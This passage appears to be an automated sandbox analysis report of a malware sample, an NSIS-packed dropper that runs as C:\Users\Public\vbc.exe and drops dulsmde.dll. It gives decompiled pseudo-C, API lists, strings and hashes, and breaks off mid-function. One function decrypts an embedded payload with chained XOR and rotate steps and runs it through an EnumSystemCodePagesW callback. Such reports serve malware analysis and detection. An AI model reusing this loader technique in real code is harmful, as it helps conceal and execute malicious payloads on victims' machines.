                                                0x004067df
                                                0x004067e2
                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00000000
                                                0x00406805
                                                0x00406803
                                                0x00406a38
                                                0x00000000
                                                0x00000000
                                                0x00406067

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                                • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 16%
                                                			E10003D10(void* __edx, void* __eflags) {
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v25;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				void* __ebx;
                                                				void* __edi;
                                                				intOrPtr _t120;
                                                				void* _t131;
                                                				void* _t214;
                                                				intOrPtr* _t283;
                                                
                                                				_v20 = 0;
                                                				 *_t283 = 0xbebc200; // executed
                                                				_t120 = E1000591F(_t131, __edx, _t214); // executed
                                                				_v20 = _t120;
                                                				if(_v20 != 0) {
                                                					 *_t283 = _v20;
                                                					_v40 = 0xde;
                                                					_v36 = 0xbebc200;
                                                					E10007DD0();
                                                					_v24 = 0;
                                                					_v24 = 0;
                                                					while(_v24 < 0x1463) {
                                                						_v25 =  *((intOrPtr*)(_v24 +  &E1001A000));
                                                						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                                						_v25 = (_v25 & 0x000000ff) + 0x74;
                                                						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                                						_v25 = 0 - (_v25 & 0x000000ff);
                                                						_v25 = (_v25 & 0x000000ff) + _v24;
                                                						_v25 = (_v25 & 0x000000ff) >> 0x00000002 | (_v25 & 0x000000ff) << 0x00000006;
                                                						_v25 = (_v25 & 0x000000ff) + _v24;
                                                						_v25 = _v25 & 0x000000ff ^ 0x000000e3;
                                                						_v25 = (_v25 & 0x000000ff) + _v24;
                                                						_v25 = _v25 & 0x000000ff ^ 0x000000a2;
                                                						_v25 = (_v25 & 0x000000ff) - _v24;
                                                						_v25 = _v25 & 0x000000ff ^ _v24;
                                                						_v25 = 0 - (_v25 & 0x000000ff);
                                                						_v25 = (_v25 & 0x000000ff) - _v24;
                                                						_v25 = _v25 & 0x000000ff ^ 0x00000080;
                                                						_v25 = (_v25 & 0x000000ff) - _v24;
                                                						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
                                                						_v25 = (_v25 & 0x000000ff) - 0xdb;
                                                						_v25 = _v25 & 0x000000ff ^ _v24;
                                                						_v25 = (_v25 & 0x000000ff) - 0xe9;
                                                						_v25 = _v25 & 0x000000ff ^ _v24;
                                                						_v25 = (_v25 & 0x000000ff) + 0xfb;
                                                						_v25 = _v25 & 0x000000ff ^ 0x000000ab;
                                                						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                                						_v25 = (_v25 & 0x000000ff) - 0x56;
                                                						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                                						_v25 = 0 - (_v25 & 0x000000ff);
                                                						_v25 = _v25 & 0x000000ff ^ _v24;
                                                						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
                                                						_v25 = _v25 & 0x000000ff ^ _v24;
                                                						_v25 = (_v25 & 0x000000ff) - _v24;
                                                						_v25 = 0 - (_v25 & 0x000000ff);
                                                						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
                                                						_v25 = (_v25 & 0x000000ff) + _v24;
                                                						_v25 = _v25 & 0x000000ff ^ 0x0000005a;
                                                						_v25 = (_v25 & 0x000000ff) - _v24;
                                                						_v25 = _v25 & 0x000000ff ^ _v24;
                                                						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
                                                						_v25 = _v25 & 0x000000ff ^ _v24;
                                                						_v25 = 0 - (_v25 & 0x000000ff);
                                                						 *((char*)(_v24 +  &E1001A000)) = _v25;
                                                						_v24 = _v24 + 1;
                                                					}
                                                					 *_t283 =  &E1001A000;
                                                					_v40 = 0;
                                                					_v32 = 0;
                                                					EnumSystemCodePagesW(??, ??); // executed
                                                				}
                                                				return 0;
                                                			}
















                                                APIs
                                                • _malloc.LIBCMT ref: 10003D27
                                                  • Part of subcall function 1000591F: __FF_MSGBANNER.LIBCMT ref: 10005936
                                                  • Part of subcall function 1000591F: __NMSG_WRITE.LIBCMT ref: 1000593D
                                                  • Part of subcall function 1000591F: RtlAllocateHeap.NTDLL(005A0000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005962
                                                • _memset.LIBCMT ref: 10003D4F
                                                • EnumSystemCodePagesW.KERNELBASE ref: 10003FDF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: AllocateCodeEnumHeapPagesSystem_malloc_memset
                                                • String ID:
                                                • API String ID: 2588709530-0
                                                • Opcode ID: a51a0219c573a77e62c53325f2c3942d8920776161f81abfc2d34c45419a42bb
                                                • Instruction ID: 6c52bdc4f57217dffc4c5858f8f7a604b9f4772a349881732ef4e96e2d482f86
                                                • Opcode Fuzzy Hash: a51a0219c573a77e62c53325f2c3942d8920776161f81abfc2d34c45419a42bb
                                                • Instruction Fuzzy Hash: CDA1D856E191EA4ACF068ABD50629FFBEF35F96191F0E058EDCD273382C5A01904D7B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405E93(CHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileA(_a4, 0x422588); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x422588;
                                                			}





                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                                • FindClose.KERNEL32(00000000), ref: 00405EAA
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                                • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E004035EB(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				int _v16;
                                                				char _v20;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t20;
                                                				signed int _t24;
                                                				void* _t28;
                                                				void* _t30;
                                                				int _t31;
                                                				void* _t34;
                                                				int _t37;
                                                				int _t38;
                                                				intOrPtr _t39;
                                                				int _t42;
                                                				intOrPtr _t60;
                                                				char _t62;
                                                				CHAR* _t64;
                                                				signed char _t68;
                                                				struct HINSTANCE__* _t76;
                                                				CHAR* _t79;
                                                				intOrPtr _t81;
                                                				CHAR* _t85;
                                                
                                                				_t81 =  *0x423f50; // 0x601fd8
                                                				_t20 = E00405F28(3);
                                                				_t88 = _t20;
                                                				if(_t20 == 0) {
                                                					_t79 = 0x420538;
                                                					"1033" = 0x7830;
                                                					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
                                                					__eflags =  *0x420538;
                                                					if(__eflags == 0) {
                                                						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
                                                					}
                                                					lstrcatA("1033", _t79);
                                                				} else {
                                                					E00405AF6("1033",  *_t20() & 0x0000ffff);
                                                				}
                                                				E004038B4(_t76, _t88);
                                                				_t24 =  *0x423f58; // 0x80
                                                				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
                                                				 *0x423fc0 = _t24 & 0x00000020;
                                                				 *0x423fdc = 0x10000;
                                                				if(E0040576C(_t88, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
                                                					L16:
                                                					if(E0040576C(_t96, _t84) == 0) {
                                                						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
                                                					}
                                                					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040);
                                                					 *0x423728 = _t28;
                                                					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t30 = E004038B4(_t76, __eflags);
                                                							__eflags =  *0x423fe0; // 0x0
                                                							if(__eflags != 0) {
                                                								_t31 = E00404F56(_t30, 0);
                                                								__eflags = _t31;
                                                								if(_t31 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x42370c; // 0x0
                                                								if(__eflags == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x420510, 5); // executed
                                                							_t37 = E00405EBA("RichEd20"); // executed
                                                							__eflags = _t37;
                                                							if(_t37 == 0) {
                                                								E00405EBA("RichEd32");
                                                							}
                                                							_t85 = "RichEdit20A";
                                                							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								GetClassInfoA(0, "RichEdit", 0x4236e0);
                                                								 *0x423704 = _t85;
                                                								RegisterClassA(0x4236e0);
                                                							}
                                                							_t39 =  *0x423720; // 0x0
                                                							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
                                                							E0040353B(E0040140B(5), 1);
                                                							return _t42;
                                                						}
                                                						L22:
                                                						_t34 = 2;
                                                						return _t34;
                                                					} else {
                                                						_t76 =  *0x423f40; // 0x400000
                                                						 *0x4236f4 = _t28;
                                                						_v20 = 0x624e5f;
                                                						 *0x4236e4 = E00401000;
                                                						 *0x4236f0 = _t76;
                                                						 *0x423704 =  &_v20;
                                                						if(RegisterClassA(0x4236e0) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						_t12 =  &_v16; // 0x624e5f
                                                						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t76 =  *(_t81 + 0x48);
                                                					if(_t76 == 0) {
                                                						goto L16;
                                                					}
                                                					_t60 =  *0x423f78; // 0x607158
                                                					_t79 = 0x422ee0;
                                                					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
                                                					_t62 =  *0x422ee0; // 0x70
                                                					if(_t62 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t62 == 0x22) {
                                                						_t79 = 0x422ee1;
                                                						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
                                                					}
                                                					_t64 = lstrlenA(_t79) + _t79 - 4;
                                                					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                                						L15:
                                                						E00405B98(_t84, E0040568B(_t79));
                                                						goto L16;
                                                					} else {
                                                						_t68 = GetFileAttributesA(_t79);
                                                						if(_t68 == 0xffffffff) {
                                                							L14:
                                                							E004056D2(_t79);
                                                							goto L15;
                                                						}
                                                						_t96 = _t68 & 0x00000010;
                                                						if((_t68 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}






























                                                APIs
                                                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 0040365C
                                                • lstrlenA.KERNEL32(pnzipglt,?,?,?,pnzipglt,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                                • lstrcmpiA.KERNEL32(?,.exe,pnzipglt,?,?,?,pnzipglt,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                                • GetFileAttributesA.KERNEL32(pnzipglt), ref: 004036EF
                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403738
                                                  • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                                • RegisterClassA.USER32 ref: 0040377F
                                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                                • CreateWindowExA.USER32 ref: 004037D0
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                                • GetClassInfoA.USER32(00000000,RichEdit20A,004236E0), ref: 00403832
                                                • GetClassInfoA.USER32(00000000,RichEdit,004236E0), ref: 0040383F
                                                • RegisterClassA.USER32(004236E0), ref: 00403848
                                                • DialogBoxParamA.USER32 ref: 00403867
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$pnzipglt$6B
                                                • API String ID: 1975747703-1529311827
                                                • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                                • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E00402C55(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				long _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t43;
                                                				signed int _t50;
                                                				void* _t53;
                                                				signed int _t54;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				signed int _t65;
                                                				signed int _t67;
                                                				signed int _t70;
                                                				signed int _t71;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				signed int _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				signed int _t90;
                                                				signed int _t93;
                                                				void* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t43 = GetTickCount();
                                                				_t91 = "C:\\Users\\Public\\vbc.exe";
                                                				 *0x423f4c = _t43 + 0x3e8; // executed
                                                				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400); // executed
                                                				_t89 = E0040586F(_t91, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x409014 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return "Error launching installer";
                                                				}
                                                				_t92 = "C:\\Users\\Public";
                                                				E00405B98("C:\\Users\\Public", _t91);
                                                				E00405B98(0x42c000, E004056D2(_t92));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				__eflags = _t50;
                                                				 *0x41f0e8 = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00402BF1(1);
                                                					__eflags =  *0x423f54 - _t82; // 0x8200
                                                					if(__eflags == 0) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v8 - _t82;
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                						_t94 = _t53;
                                                						_t54 =  *0x423f54; // 0x8200
                                                						E004030B3(_t54 + 0x1c);
                                                						_push(_v24);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff); // executed
                                                						_t57 = E00402E8E(); // executed
                                                						__eflags = _t57 - _v24;
                                                						if(_t57 == _v24) {
                                                							__eflags = _v44 & 0x00000001;
                                                							 *0x423f50 = _t94;
                                                							 *0x423f58 =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x423f5c =  *0x423f5c + 1;
                                                								__eflags =  *0x423f5c;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                								__eflags = _t85;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E00405830(0x423f60, _t94 + 4, 0x40);
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E004030B3( *0x40b0d8);
                                                					_t65 = E00403081( &_a4, 4);
                                                					__eflags = _t65;
                                                					if(_t65 == 0) {
                                                						goto L29;
                                                					}
                                                					__eflags = _v12 - _a4;
                                                					if(_v12 != _a4) {
                                                						goto L29;
                                                					}
                                                					goto L28;
                                                				} else {
                                                					do {
                                                						_t67 =  *0x423f54; // 0x8200
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                                						__eflags = _t93 - _t70;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						_t71 = E00403081(0x4170e8, _t90); // executed
                                                						__eflags = _t71;
                                                						if(_t71 == 0) {
                                                							E00402BF1(1);
                                                							L29:
                                                							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						__eflags =  *0x423f54;
                                                						if( *0x423f54 != 0) {
                                                							__eflags = _a4 & 0x00000002;
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00402BF1(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E00405830( &_v44, 0x4170e8, 0x1c);
                                                						_t77 = _v44;
                                                						__eflags = _t77 & 0xfffffff0;
                                                						if((_t77 & 0xfffffff0) != 0) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v40 - 0xdeadbeef;
                                                						if(_v40 != 0xdeadbeef) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v28 - 0x74736e49;
                                                						if(_v28 != 0x74736e49) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v32 - 0x74666f73;
                                                						if(_v32 != 0x74666f73) {
                                                							goto L20;
                                                						}
                                                						__eflags = _v36 - 0x6c6c754e;
                                                						if(_v36 != 0x6c6c754e) {
                                                							goto L20;
                                                						}
                                                						_a4 = _a4 | _t77;
                                                						_t87 =  *0x40b0d8; // 0x8200
                                                						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
                                                						_t80 = _v20;
                                                						__eflags = _t80 - _t93;
                                                						 *0x423f54 = _t87;
                                                						if(_t80 > _t93) {
                                                							goto L29;
                                                						}
                                                						__eflags = _a4 & 0x00000008;
                                                						if((_a4 & 0x00000008) != 0) {
                                                							L16:
                                                							_v8 = _v8 + 1;
                                                							_t93 = _t80 - 4;
                                                							__eflags = _t90 - _t93;
                                                							if(_t90 > _t93) {
                                                								_t90 = _t93;
                                                							}
                                                							goto L20;
                                                						}
                                                						__eflags = _a4 & 0x00000004;
                                                						if((_a4 & 0x00000004) != 0) {
                                                							break;
                                                						}
                                                						goto L16;
                                                						L20:
                                                						__eflags = _t93 -  *0x41f0e8;
                                                						if(_t93 <  *0x41f0e8) {
                                                							_v12 = E00405F97(_v12, 0x4170e8, _t90);
                                                						}
                                                						 *0x40b0d8 =  *0x40b0d8 + _t90;
                                                						_t93 = _t93 - _t90;
                                                						__eflags = _t93;
                                                					} while (_t93 > 0);
                                                					_t82 = 0;
                                                					__eflags = 0;
                                                					goto L24;
                                                				}
                                                			}

                                                APIs
                                                • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,?,00000000), ref: 00402C66
                                                • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402C82
                                                  • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405873
                                                  • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402CCE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                                • API String ID: 4283519449-2896468223
                                                • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                                • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E00401751(FILETIME* __ebx, void* __eflags) {
                                                				void* _t33;
                                                				void* _t41;
                                                				void* _t43;
                                                				FILETIME* _t49;
                                                				FILETIME* _t62;
                                                				void* _t64;
                                                				signed int _t70;
                                                				FILETIME* _t71;
                                                				FILETIME* _t75;
                                                				signed int _t77;
                                                				void* _t80;
                                                				CHAR* _t82;
                                                				void* _t85;
                                                
                                                				_t75 = __ebx;
                                                				_t82 = E00402A29(0x31);
                                                				 *(_t85 - 0xc) = _t82;
                                                				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                				_t33 = E004056F8(_t82);
                                                				_push(_t82);
                                                				if(_t33 == 0) {
                                                					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
                                                				} else {
                                                					_push(0x409c10);
                                                					E00405B98();
                                                				}
                                                				E00405DFA(0x409c10);
                                                				while(1) {
                                                					__eflags =  *(_t85 + 8) - 3;
                                                					if( *(_t85 + 8) >= 3) {
                                                						_t64 = E00405E93(0x409c10);
                                                						_t77 = 0;
                                                						__eflags = _t64 - _t75;
                                                						if(_t64 != _t75) {
                                                							_t71 = _t64 + 0x14;
                                                							__eflags = _t71;
                                                							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                						__eflags = _t70;
                                                						 *(_t85 + 8) = _t70;
                                                					}
                                                					__eflags =  *(_t85 + 8) - _t75;
                                                					if( *(_t85 + 8) == _t75) {
                                                						E00405850(0x409c10);
                                                					}
                                                					__eflags =  *(_t85 + 8) - 1;
                                                					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                					__eflags = _t41 - 0xffffffff;
                                                					 *(_t85 - 8) = _t41;
                                                					if(_t41 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t85 + 8) - _t75;
                                                					if( *(_t85 + 8) != _t75) {
                                                						E00404E84(0xffffffe2,  *(_t85 - 0xc));
                                                						__eflags =  *(_t85 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
                                                						__eflags =  *0x423fc8;
                                                						goto L32;
                                                					} else {
                                                						E00405B98(0x40a410, 0x425000);
                                                						E00405B98(0x425000, 0x409c10);
                                                						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\Albus\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                						E00405B98(0x425000, 0x40a410);
                                                						_t62 = E00405459("C:\Users\Albus\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                						__eflags = _t62;
                                                						if(_t62 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t62 == 1;
                                                							if(_t62 == 1) {
                                                								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
                                                								L32:
                                                								_t49 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(0x409c10);
                                                								_push(0xfffffffa);
                                                								E00404E84();
                                                								L29:
                                                								_t49 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
